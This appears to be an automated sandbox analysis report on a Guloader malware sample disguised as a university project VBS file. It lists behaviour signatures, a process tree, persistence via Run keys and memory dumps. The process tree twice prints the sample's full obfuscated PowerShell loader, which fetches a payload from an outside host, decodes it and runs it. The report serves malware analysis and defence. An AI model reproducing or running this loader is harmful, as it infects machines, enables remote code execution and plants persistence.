Overview

overview

10

Static

static

1

Abu Dhabi ...68.vbs

windows7-x64

10

Abu Dhabi ...68.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    13/02/2024, 04:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Abu Dhabi University_project_334568.vbs

  • Size

    36KB

  • MD5

    de8bb4e7b3b42adcc01eaf37409ba15a

  • SHA1

    77e869d2cdb86aea090f14a444e0d1ee39e5cd68

  • SHA256

    4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001

  • SHA512

    5258eaf86e2da5799b8d4c73c5b7047502d7e66000bef6b6680aafc931c7590eb005917c9af4c8a788ee16638870354c3f044434d381b934f5ada38c09a48569

  • SSDEEP

    768:vUJZmkTEmGkXZwCwzWfMKjWcHISdD0i6z2l+KaRB0e:cJLEXM9wzPKjXHISJ0i6z2w/f

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Adds policy Run key to start application 2 TTPs 1 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:1252
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Abu Dhabi University_project_334568.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sengetj;function Inacho37 ($Reunitea, $Stasop, $Unre) {$Reunitea.'Substring'( $Stasop, $Unre);}Function Over9 ([String]$Leadoffe){For($Boilers=5; $Boilers -lt $Leadoffe.Length-$Camp; $Boilers+=6){$Concisely=Inacho37 $Leadoffe $Boilers $Camp;$Finans=$Finans+$Concisely}$Finans;}$Sneboldeff = 'tzutil /l';$Skva44 = (cmd /c $Sneboldeff);$Skva44 = [string]$Skva44;$BoilersNDICE = $Skva44.indexOf('1');$Camp = Inacho37 $Skva44 $BoilersNDICE 1;$Nonp=Over9 ' kanihFejletScopotNonacp Arbi:Amphi/Forel/Chowc4Fileh6 Spkl.kongs1Udann8 Udtr3 Hair.Prepr2neate2Udspi2 Indu.Trafi1Bakni9retsm/MandeOHalitpSalumsAssesvSkggeuTikrolForfamFirepeRabbi.ValutdUncons ImpopHypno ';$Finans01=Over9 'PensiiAncreeGeorgx Stud ';$Samsskb = Over9 'Epupi\HandlsSamaryDistesStenmwNonmeoUnattw Bere6 Glos4Bejds\EcuadWAbonniHypernRadiadCacozoPermuwkardisSvajnP PlatoCapmawForpre AflurPhoenSLscflh FrisejaloulBlentlEksam\ ConfvChatt1Yndig.Storl0 Naga\IfsvipHouseo Duftw CasaeSammerPtsmksPatenhdualieStrobl Pyralcremn.NoneveDobbexAssemeradia ';&($Finans01) (Over9 'Overi$MinimSOverlpUtjeklFolinaFlove2Konfi= Rang$Syphie RevinSyllavAftvi:ExcitwNongiiKrambn UnredDiethiMultir Oven ') ;&($Finans01) (Over9 'Dyret$BrnepSTypogaBlokhmJugulsWinchsTumpfkBordebTubif=Under$ AnsvS EnfepLnsitlSurbeaHiero2Ynksm+Playm$ObskuSEkspaaSneplmPrints Fetas WaylkBenthbTrdes ') ;&($Finans01) (Over9 ' Fore$BegreELindekGatatsFoalte UndemGentopKendteAfbinl nicktMinimeSkovr Renab=Talni Kile(Betvi(PippigBitinwChirpm Stati Affa Sakfrwpreeli EchonUnbud3Resse2Atlas_Calypp Cowhr Blaco DreacKonfre TrlasKorrespanda Trans-FabriFCynop IncesPPakkergtebaoSignicSakkae SoeesSkibssCamelIEksisdUdbyt=Salmi$Plund{ KokePAppliIdysmoDfloru} Aand)Desmo.fueloCstilloSkatomRestamTerriaDitzinKortsdFaceoLStkkeiDisapnAdelaeFremm)repeo Borta-BinghsLnindpHanknlStvneiOverstBrogu Tocc[Tronpc NasthPinseaKunstrCorom]Barne3Cyber4Throu ');&($Finans01) (Over9 ' Undi$FolkeS EpippUnyttiSubcodSlabbsProgrfViden slurr=Terat Cusks$podiaEGumbokcincisChefge JaegmShintpSkulpeRdarvlOverst VexieDunie[Julek$ PleaE MedikGendasDipheemarblmUnsabpYeshie Foldl UbebtBabaje Lyci. ExcrcNauruoEmoluukropdnSpaketPrime-Prang2Uviss]Stere ');&($Finans01) (Over9 ' Poli$VelseOKagesmIndisdTrersa MicrnUnivenstifieAnoin=Miens(EmneaTGynece RevisExtrat Adko-ProabPHelbeaSkindtAtonah Indk Stop$HerniSTeskeaSarksm Tryks StjrsArithkHelmhbBudbr)Gulli Hjemm-SnerlA impanBraildBevid Virus(Umtte[TumliIAvancnUnsedt UnasPPyopot Forrr Fore]Vrels:Doles:FoamssSgersiStenuzjerngeLakfj Tribo-OutpoeBrdflqOpsge Sheat8Fuelo)Suben ') ;if ($Omdanne) {.$Samsskb $Spidsf;} else {;$Finans00=Over9 'BanglSPirogtTuensaLbetirNonintKontr-KlemsBRealliSammetOlietsUnfeaTTuladrAldidaForannCoryds richfStraneKashurKryds Fangi-KutenS CapooBrahmu StdprPantec Kirtebarbe Modta$ UndsNNeedloUlykknRansop Expe Dehy-BrsigDrivuleUdbansHighbttruehiJrginnDemora FlagtHasteiPlagso sapinIlsom Engel$AutenSBusfapTrimelfeveraItali2Encho ';&($Finans01) (Over9 'Super$MaddiSubeslp SvenlVerdiaTilgr2Fodbo=Ethox$CotereAgurknSalgsvarche: UnosaVinstpSonorpZoomodstropa KdvatCorpoaHafto ') ;&($Finans01) (Over9 'MisusIKoldtmHydropBorgmoDonumrDiplotWaggo-BrillMOndsioSkuffdFactuuFyldelInsipe Yata PantaBtilegi EvoltSorelsKorneTbommerFrilgaCyclonWcspesTrafifLabileoverirDiest ') ;$Spla2=$Spla2+'\Stat.Kol';while (-not $Retankam) {&($Finans01) (Over9 ' Paal$aedilRCodife CurstunscaaDolkenPyocykAnisbaStokemSkrib=Likvi( ProlTSuggeeAntimsUnunitRaind-StanzP EuchaHovmotRetaihKalkm taans$SociaSAorispUnderlOutlaaJoyle2Bejez)Canke ') ;&($Finans01) $Finans00;&($Finans01) (Over9 'LouanSangultIndicaTilfgrCommetKosmo-IndsnSStrstlCorcleSejrveLnnedppapir Data5Andan ');}&($Finans01) (Over9 'raads$StvniOalithv CauleFidgerGoldi Uddat=Paris FiredGProcoeMadrot Vari- TitlCSociaoTekstn DemitFedesePageunMervrtAtloa Dyrk$SidegSBlystpSlutnl BarcaSulfo2Planl ');&($Finans01) (Over9 'Ricin$StenrOFormsp Bisca TranlRedigiKnscesOzenahBefjeb Snoo Span=Forst laang[TelynSGliocyBaldasSursytTonjoe FucomIntim.FlamlCHemitoHalvmnThailvNonnaeTaarnrPaedat Wrok]otone:Nycta:UntakFMultir Muddooctylm BathBCarpoaRivers GobeeLysim6Forli4OstenSBismet AbutrBaulkiRunklnDatalgTapet(Prest$ ukriOSupervEskadeBdestrEyela)Lensa ');&($Finans01) (Over9 'Locat$BurdaFHusleiMelapnShowwa Shinn MarasUddel2 Seve Polic= Circ Betyd[FloodS BefjyOverssBlaaftOwetieFuldkmFlett.VicedTCentieHnsehxDyssetOpgav.FarefEKnippn AcrocAntidoNonindtelcoi BelunGlutigDeskr]Barth:Bibli: ShivA PersSOutseCYnderIterseIPhleb. OrbiGJingleRvenstQuadrSFattitAtmenrKnighiCarbunRevsegCladd(Tilnr$ BillOUdslapFrdigaOverkl AutoiKetipssuccohRectibIndst)Powde ');&($Finans01) (Over9 ' Flyb$FremsCDenasuPejlepLadyeufjtedlDdsfo=Oryde$AtabeFTitiliSpatinUdspeaFyrafnObskus Skva2Mccal.Forans LobeuBoatlbnitros Rorkt BurirAllitiDemognFrnutgSomat(Marri2Fedts9udvik8Sygev4Convo4Hidti5Indse,Video1outta9Angel4Forpe1Aabni9 Unde) Staa ');&($Finans01) $Cupul;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2676
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "tzutil /l"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2784
          • C:\Windows\system32\tzutil.exe
            tzutil /l
            5⤵
              PID:2864
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sengetj;function Inacho37 ($Reunitea, $Stasop, $Unre) {$Reunitea.'Substring'( $Stasop, $Unre);}Function Over9 ([String]$Leadoffe){For($Boilers=5; $Boilers -lt $Leadoffe.Length-$Camp; $Boilers+=6){$Concisely=Inacho37 $Leadoffe $Boilers $Camp;$Finans=$Finans+$Concisely}$Finans;}$Sneboldeff = 'tzutil /l';$Skva44 = (cmd /c $Sneboldeff);$Skva44 = [string]$Skva44;$BoilersNDICE = $Skva44.indexOf('1');$Camp = Inacho37 $Skva44 $BoilersNDICE 1;$Nonp=Over9 ' kanihFejletScopotNonacp Arbi:Amphi/Forel/Chowc4Fileh6 Spkl.kongs1Udann8 Udtr3 Hair.Prepr2neate2Udspi2 Indu.Trafi1Bakni9retsm/MandeOHalitpSalumsAssesvSkggeuTikrolForfamFirepeRabbi.ValutdUncons ImpopHypno ';$Finans01=Over9 'PensiiAncreeGeorgx Stud ';$Samsskb = Over9 'Epupi\HandlsSamaryDistesStenmwNonmeoUnattw Bere6 Glos4Bejds\EcuadWAbonniHypernRadiadCacozoPermuwkardisSvajnP PlatoCapmawForpre AflurPhoenSLscflh FrisejaloulBlentlEksam\ ConfvChatt1Yndig.Storl0 Naga\IfsvipHouseo Duftw CasaeSammerPtsmksPatenhdualieStrobl Pyralcremn.NoneveDobbexAssemeradia ';&($Finans01) (Over9 'Overi$MinimSOverlpUtjeklFolinaFlove2Konfi= Rang$Syphie RevinSyllavAftvi:ExcitwNongiiKrambn UnredDiethiMultir Oven ') ;&($Finans01) (Over9 'Dyret$BrnepSTypogaBlokhmJugulsWinchsTumpfkBordebTubif=Under$ AnsvS EnfepLnsitlSurbeaHiero2Ynksm+Playm$ObskuSEkspaaSneplmPrints Fetas WaylkBenthbTrdes ') ;&($Finans01) (Over9 ' Fore$BegreELindekGatatsFoalte UndemGentopKendteAfbinl nicktMinimeSkovr Renab=Talni Kile(Betvi(PippigBitinwChirpm Stati Affa Sakfrwpreeli EchonUnbud3Resse2Atlas_Calypp Cowhr Blaco DreacKonfre TrlasKorrespanda Trans-FabriFCynop IncesPPakkergtebaoSignicSakkae SoeesSkibssCamelIEksisdUdbyt=Salmi$Plund{ KokePAppliIdysmoDfloru} Aand)Desmo.fueloCstilloSkatomRestamTerriaDitzinKortsdFaceoLStkkeiDisapnAdelaeFremm)repeo Borta-BinghsLnindpHanknlStvneiOverstBrogu Tocc[Tronpc NasthPinseaKunstrCorom]Barne3Cyber4Throu ');&($Finans01) (Over9 ' Undi$FolkeS EpippUnyttiSubcodSlabbsProgrfViden slurr=Terat Cusks$podiaEGumbokcincisChefge JaegmShintpSkulpeRdarvlOverst VexieDunie[Julek$ PleaE MedikGendasDipheemarblmUnsabpYeshie Foldl UbebtBabaje Lyci. ExcrcNauruoEmoluukropdnSpaketPrime-Prang2Uviss]Stere ');&($Finans01) (Over9 ' Poli$VelseOKagesmIndisdTrersa MicrnUnivenstifieAnoin=Miens(EmneaTGynece RevisExtrat Adko-ProabPHelbeaSkindtAtonah Indk Stop$HerniSTeskeaSarksm Tryks StjrsArithkHelmhbBudbr)Gulli Hjemm-SnerlA impanBraildBevid Virus(Umtte[TumliIAvancnUnsedt UnasPPyopot Forrr Fore]Vrels:Doles:FoamssSgersiStenuzjerngeLakfj Tribo-OutpoeBrdflqOpsge Sheat8Fuelo)Suben ') ;if ($Omdanne) {.$Samsskb $Spidsf;} else {;$Finans00=Over9 'BanglSPirogtTuensaLbetirNonintKontr-KlemsBRealliSammetOlietsUnfeaTTuladrAldidaForannCoryds richfStraneKashurKryds Fangi-KutenS CapooBrahmu StdprPantec Kirtebarbe Modta$ UndsNNeedloUlykknRansop Expe Dehy-BrsigDrivuleUdbansHighbttruehiJrginnDemora FlagtHasteiPlagso sapinIlsom Engel$AutenSBusfapTrimelfeveraItali2Encho ';&($Finans01) (Over9 'Super$MaddiSubeslp SvenlVerdiaTilgr2Fodbo=Ethox$CotereAgurknSalgsvarche: UnosaVinstpSonorpZoomodstropa KdvatCorpoaHafto ') ;&($Finans01) (Over9 'MisusIKoldtmHydropBorgmoDonumrDiplotWaggo-BrillMOndsioSkuffdFactuuFyldelInsipe Yata PantaBtilegi EvoltSorelsKorneTbommerFrilgaCyclonWcspesTrafifLabileoverirDiest ') ;$Spla2=$Spla2+'\Stat.Kol';while (-not $Retankam) {&($Finans01) (Over9 ' Paal$aedilRCodife CurstunscaaDolkenPyocykAnisbaStokemSkrib=Likvi( ProlTSuggeeAntimsUnunitRaind-StanzP EuchaHovmotRetaihKalkm taans$SociaSAorispUnderlOutlaaJoyle2Bejez)Canke ') ;&($Finans01) $Finans00;&($Finans01) (Over9 'LouanSangultIndicaTilfgrCommetKosmo-IndsnSStrstlCorcleSejrveLnnedppapir Data5Andan ');}&($Finans01) (Over9 'raads$StvniOalithv CauleFidgerGoldi Uddat=Paris FiredGProcoeMadrot Vari- TitlCSociaoTekstn DemitFedesePageunMervrtAtloa Dyrk$SidegSBlystpSlutnl BarcaSulfo2Planl ');&($Finans01) (Over9 'Ricin$StenrOFormsp Bisca TranlRedigiKnscesOzenahBefjeb Snoo Span=Forst laang[TelynSGliocyBaldasSursytTonjoe FucomIntim.FlamlCHemitoHalvmnThailvNonnaeTaarnrPaedat Wrok]otone:Nycta:UntakFMultir Muddooctylm BathBCarpoaRivers GobeeLysim6Forli4OstenSBismet AbutrBaulkiRunklnDatalgTapet(Prest$ ukriOSupervEskadeBdestrEyela)Lensa ');&($Finans01) (Over9 'Locat$BurdaFHusleiMelapnShowwa Shinn MarasUddel2 Seve Polic= Circ Betyd[FloodS BefjyOverssBlaaftOwetieFuldkmFlett.VicedTCentieHnsehxDyssetOpgav.FarefEKnippn AcrocAntidoNonindtelcoi BelunGlutigDeskr]Barth:Bibli: ShivA PersSOutseCYnderIterseIPhleb. OrbiGJingleRvenstQuadrSFattitAtmenrKnighiCarbunRevsegCladd(Tilnr$ BillOUdslapFrdigaOverkl AutoiKetipssuccohRectibIndst)Powde ');&($Finans01) (Over9 ' Flyb$FremsCDenasuPejlepLadyeufjtedlDdsfo=Oryde$AtabeFTitiliSpatinUdspeaFyrafnObskus Skva2Mccal.Forans LobeuBoatlbnitros Rorkt BurirAllitiDemognFrnutgSomat(Marri2Fedts9udvik8Sygev4Convo4Hidti5Indse,Video1outta9Angel4Forpe1Aabni9 Unde) Staa ');&($Finans01) $Cupul;}"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2968
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "tzutil /l"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2640
              • C:\Windows\SysWOW64\tzutil.exe
                tzutil /l
                6⤵
                  PID:2660
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                5⤵
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:2760
        • C:\Windows\SysWOW64\SyncHost.exe
          "C:\Windows\SysWOW64\SyncHost.exe"
          2⤵
          • Adds policy Run key to start application
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:2432

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K3XENVSLWE7IDAFMCYYH.temp
        Filesize

        7KB

        MD5

        b63f2acea4f6f1d82e9d7d8b09ee12e7

        SHA1

        c519b27c9f0da4f60e34f8404c2260fd6a9145d9

        SHA256

        4c4367f8d7d7e6953c78f1f47024a8054a13d3971d892e308475b9893901842a

        SHA512

        219c983f5e05bb16748fa8101a1a620edbc0ba62e731ca1b5d5456e90983cd17f19d800357bffee9f763499340f871f8fb5282355fcf210527cee54a6767c778

        Download Submit

      • memory/1252-61-0x0000000003830000-0x0000000003930000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/1252-62-0x0000000008AD0000-0x000000000A89A000-memory.dmp

        Filesize

        29.8MB

        Download

      • memory/1252-70-0x0000000008AD0000-0x000000000A89A000-memory.dmp

        Filesize

        29.8MB

        Download

      • memory/2432-66-0x00000000021C0000-0x00000000024C3000-memory.dmp

        Filesize

        3.0MB

        Download

      • memory/2432-69-0x0000000000980000-0x0000000000A22000-memory.dmp

        Filesize

        648KB

        Download

      • memory/2432-63-0x0000000000080000-0x00000000000BC000-memory.dmp

        Filesize

        240KB

        Download

      • memory/2432-64-0x0000000000080000-0x00000000000BC000-memory.dmp

        Filesize

        240KB

        Download

      • memory/2432-67-0x0000000000080000-0x00000000000BC000-memory.dmp

        Filesize

        240KB

        Download

      • memory/2432-71-0x0000000000080000-0x00000000000BC000-memory.dmp

        Filesize

        240KB

        Download

      • memory/2676-27-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2676-31-0x00000000025F0000-0x0000000002670000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2676-6-0x0000000002560000-0x0000000002568000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2676-9-0x00000000025F0000-0x0000000002670000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2676-28-0x00000000025F0000-0x0000000002670000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2676-29-0x00000000025F0000-0x0000000002670000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2676-30-0x00000000025F0000-0x0000000002670000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2676-8-0x00000000025F0000-0x0000000002670000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2676-53-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2676-11-0x00000000025F0000-0x0000000002670000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2676-10-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2676-7-0x00000000025F0000-0x0000000002670000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2676-5-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2676-4-0x000000001B260000-0x000000001B542000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2760-55-0x0000000000670000-0x000000000376E000-memory.dmp

        Filesize

        49.0MB

        Download

      • memory/2760-56-0x000000001F760000-0x000000001FA63000-memory.dmp

        Filesize

        3.0MB

        Download

      • memory/2760-68-0x0000000000350000-0x0000000000373000-memory.dmp

        Filesize

        140KB

        Download

      • memory/2760-43-0x0000000000670000-0x000000000376E000-memory.dmp

        Filesize

        49.0MB

        Download

      • memory/2760-44-0x0000000077880000-0x0000000077A29000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/2760-45-0x0000000077A70000-0x0000000077B46000-memory.dmp

        Filesize

        856KB

        Download

      • memory/2760-46-0x0000000077AA6000-0x0000000077AA7000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2760-47-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2760-65-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2760-60-0x0000000000350000-0x0000000000373000-memory.dmp

        Filesize

        140KB

        Download

      • memory/2760-50-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2760-51-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2760-59-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2760-57-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2760-54-0x0000000000400000-0x0000000000581000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/2968-39-0x0000000006380000-0x000000000947E000-memory.dmp

        Filesize

        49.0MB

        Download

      • memory/2968-34-0x00000000002D0000-0x0000000000310000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2968-40-0x0000000077880000-0x0000000077A29000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/2968-52-0x0000000006380000-0x000000000947E000-memory.dmp

        Filesize

        49.0MB

        Download

      • memory/2968-49-0x0000000073970000-0x0000000073F1B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2968-38-0x0000000006380000-0x000000000947E000-memory.dmp

        Filesize

        49.0MB

        Download

      • memory/2968-37-0x0000000005AF0000-0x0000000005AF1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2968-41-0x0000000077A70000-0x0000000077B46000-memory.dmp

        Filesize

        856KB

        Download

      • memory/2968-33-0x0000000073970000-0x0000000073F1B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2968-48-0x00000000002D0000-0x0000000000310000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2968-32-0x0000000073970000-0x0000000073F1B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2968-17-0x00000000002D0000-0x0000000000310000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2968-42-0x0000000006380000-0x000000000947E000-memory.dmp

        Filesize

        49.0MB

        Download

      • memory/2968-16-0x00000000002D0000-0x0000000000310000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2968-15-0x0000000073970000-0x0000000073F1B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2968-14-0x0000000073970000-0x0000000073F1B000-memory.dmp

        Filesize

        5.7MB

        Download